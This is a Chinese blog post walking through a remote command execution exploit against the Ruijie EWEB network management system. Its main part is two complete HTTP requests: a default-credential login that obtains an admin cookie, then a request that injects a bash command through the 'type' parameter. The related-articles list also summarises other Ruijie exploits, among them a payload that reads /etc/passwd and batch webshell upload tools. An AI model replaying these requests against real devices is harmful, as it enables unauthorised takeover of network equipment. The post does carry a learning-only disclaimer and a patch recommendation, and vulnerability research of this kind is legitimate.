锐捷EWEB网管系统RCE漏洞

最新推荐文章于 2024-06-11 21:38:27 发布
最新推荐文章于 2024-06-11 21:38:27 发布
阅读量502 收藏 1
点赞数 2
文章标签: 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/138702387
版权

文章目录

免责声明

该文章只为学习和交流,请不要做违法乱纪的事情,如有与本人无关

漏洞描述

锐捷网管系统是由北京锐捷数据时代科技有限公司开发的新一代基于云的网络管理软件,以"数据时代创新网管与信息安全"为口号,定位于终端安全、IT运营及企业服务化管理统一解决方案。

漏洞原理

在该系统的/flow_control_pi/flwo.control.php的文件中存在命令执行参数

影响版本

不详

漏洞复现

在这里插入图片描述
用post请求访问/ddi/server/login.php页面并提交admin参数可以获得管理员的cookie

POST /ddi/server/login.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

username=admin&password=admin?

在这里插入图片描述
使用cookie向/flow_control_pi/flwo.control.php?a=getFlowGroup 提交type参数

POST /flow_control_pi/flwo.control.php?a=getFlowGroup HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
Cookie:  RUIJIEID=q6g97tqc32rl4bl8h89gjub031; user=admin;
Accept-Encoding: gzip
Connection: close

type=|bash+-c+'ping+-c+4+ip'

在这里插入图片描述

修复建议

升级到最新版本

抠脚大汉在网络
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
锐捷EWEB网管系统 RCE漏洞复现
0xSec
12-02 2490
Ruijie-EWEB 网管系统 flwo.control.php 中的 type 参数存在命令执行漏洞,攻击者可利用该漏洞执行任意命令,写入后门,获取服务器权限,进而控制整个web服务器。
漏洞复现】锐捷 EWEB auth 远程代码执行漏洞
qq_67810151的博客
03-26 328
锐捷 EWEB auth接口存在远程代码执行漏洞,未授权的攻击者可以通过该漏洞执行恶意命令,进而导致服务器失陷。
RuijieRCE:锐捷锐捷网络RCE突破检测工具,可批量检测
03-06
自述文件 瑞杰网络RCE漏洞检测工具,为方便渗透测试使用,可以批量检测,也会生成历史记录。同时也为防止他人恶意使用,可自定义GET参数密码,该密码由sha256加密,难以破解。 免责声明 由于传播,利用此文所提供的信息而造成的任何直接或间接的后果及损失,均由使用者本人负责,作者不承担任何责任。 参数 -f string 导入.txt文件批量扫描 -n string 自定义POST木马密码,默认cmd -p string 自定义GET密码验证,默认为cmd -u string 目标URL 使用 检测到防御后生成随机数.php文件执行命令,也可以上菜刀。 普通使用 GET密码:cmd POST密码:cmd ./RuijieRCE -u http://127.0.0.1:4430 设置密码 -n参数为POST密码,-p参数为GET密码这两
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell
CCPxxxXxxx的博客
08-04 9840
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell 漏洞编号: CNVD-2021-09650 漏洞描述:锐捷NBR路由器 EWEB网关系统部分接口存在命令注入,导致远程命令执行获取 漏洞影响: 锐捷NBR路由器 EWEB网关系统 漏洞复现: 首先打开网关系统 然后在URL后面加 /guest_auth/guestIsUp.php,此路径为漏洞存在地。 我们打开hacker Bar,在Post data 输入 mac=1&ip=127.0.0.1|cat /etc/pas
锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞(CNVD-2021-09650)——漏洞复现
最新发布
2301_76437855的博客
06-11 207
锐捷网络股份有限公司是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。公开日期:2021-09-19漏洞编号:CNVD-2021-09650危害等级:高危漏洞描述:锐捷NBR路由器存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。
【渗透测试】锐捷网络-EWEB网管系统易网关批量GetShell
SunnyCat
01-18 9292
锐捷网络-EWEB网管系统易网关批量GetShell 特征:4430端口,锐捷EG网关 方式:配合vps使用哥斯拉php马getshll 步骤 1、 在自己的vps上放置一个冰蝎或者哥斯拉的php马(保存成txt格式),开启vps的http服务(我是用使用哥斯拉php马) 2、 在EGGatewayGetShell.jar工具包中的url.txt文件中放入批量攻击目标 3、 使用EGGatewayGetShell.jar工具让EG网关自己下载txt马文件 4、 使用哥斯拉连接 工具:https://gi
漏洞复现】锐捷 EWEB auth 远程命令执行漏洞
weixin_52204925的博客
03-08 1861
auth接口存在RCE漏洞,恶意攻击者可能会利用该漏洞执行恶意命令,进而导致服务器失陷。
锐捷网络系统
03-03
网络开发,有用的东西,锐捷校园版,希望您能接受这个东西,谢谢
锐捷路由器命令执行漏洞(CVE-2023-3450)
xiaokp7的博客
09-13 839
RG-BCR860是锐捷网络推出的一款商业云路由器,它是专为酒店、餐饮、门店设计,适用带宽100Mbps,带机量可达150台,支持Sec VPM、内置安全审计模块,给商家带来更好的网络营销体验。该产品主支持全中文的WEB 界面配置,不再需要用传统的命令行进行配置,使得设备更加简单方便的进行维护和管理。RG-BCR860 2.5.13版本存在操作系统命令注入漏洞,该漏洞源于组件Network Diagnostic Page存在问题,会导致操作系统命令注入。
锐捷 RG-UAC 统一上网行为管理审计系统信息泄露漏洞(CNVD-2021-14536)
Fengxin的博客
11-03 1210
0x01 漏洞描述 锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台 0x02 漏洞影响 锐捷RG-UAC统一上网行为管理审计系统 0x03 漏洞复现 使用FOFA语句包含关键字查找FOFA语句 title="RG-UAC登录页面" && body="admin" 登录界面 直接CTRL+U查看源代码,搜索password https://www.somd5.com/ 解密MD5加密的password 即可使用admin,密码登录进系
锐捷网络破解
08-29
替换掉原EXE文件,支持WIFI共享,特别适合校园网用户,一台电脑上网,全寝室都能收到笔记本发出的WIFI信号。支持安装和IPHONE。
eWebArticle(极限文章管理系统) v1.0 Beta1
07-22
1、动静态模式可选:2、智能文件生成:3、批量文件生成:4、无限级分类:5、超炫导航菜单:6、强大的内容采集:7、完全基于模板架构:8、多频道支持:9、可视内容编辑:
EgGateWayGetShell:锐捷EG易网关批量GetShell Code By
05-29
例子: java -jar EGGatewayGetShell.jar RPC 网络外壳:
锐捷无限地勘系统v1.2版本
04-10
锐捷无限地勘系统1.2版本,仅供学习和参考!
锐捷商通奶茶管理系统V11安装视频教程
08-21
鉴于很多新手朋友不会安装锐捷商通系列软件,故而出此视频教程!仅供参考!
锐捷无线地勘系统V1.2
07-05
这是锐捷无线地勘系统V1.2,此系统仅用于学习,不能用于其他用途,否则后果自负
2023年江苏省网络系统管理赛项A模块真题
03-12
2023年江苏省网络系统管理赛项A模块真题,用于学习交流,禁止用于商用。 2023年江苏省网络系统管理赛项A模块真题,用于学习交流,禁止用于商用。 2023年江苏省网络系统管理赛项A模块真题,用于学习交流,禁止用于...
锐捷路由器文件上传漏洞
08-13
对于锐捷路由器文件上传漏洞,我了解一些相关信息。锐捷路由器在过去曾存在一个文件上传漏洞,攻击者可以利用该漏洞上传恶意文件到路由器中,进而执行任意代码或者获取敏感信息。这个漏洞可能会导致网络受到攻击,进而威胁到用户的数据安全。 为了防止受到这个漏洞的影响,建议用户及时采取以下安全措施: 1. 及时更新固件:锐捷网络已经发布了修复该漏洞的固件版本。用户应该及时检查并更新路由器的固件,以确保系统具备最新的安全补丁。 2. 启用访问控制:用户可以通过启用访问控制列表(ACL)来限制路由器的访问权限,只允许信任的设备连接到路由器。 3. 强化密码策略:使用强密码,并定期更换密码,以防止未授权访问。 4. 禁用远程管理:如果不需要远程管理功能,最好将其禁用,以减少攻击面。 5. 防火墙配置:配置适当的防火墙规则,限制对路由器的访问和流量。 6. 定期备份:定期备份路由器的配置和重要数据,以便在发生安全事件时能够快速恢复。 请注意,这只是一些建议,并不能完全消除潜在的风险。如果您怀疑自己的路由器受到漏洞影响,建议及时联系厂商或专业人士进行进一步的检查和修复。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值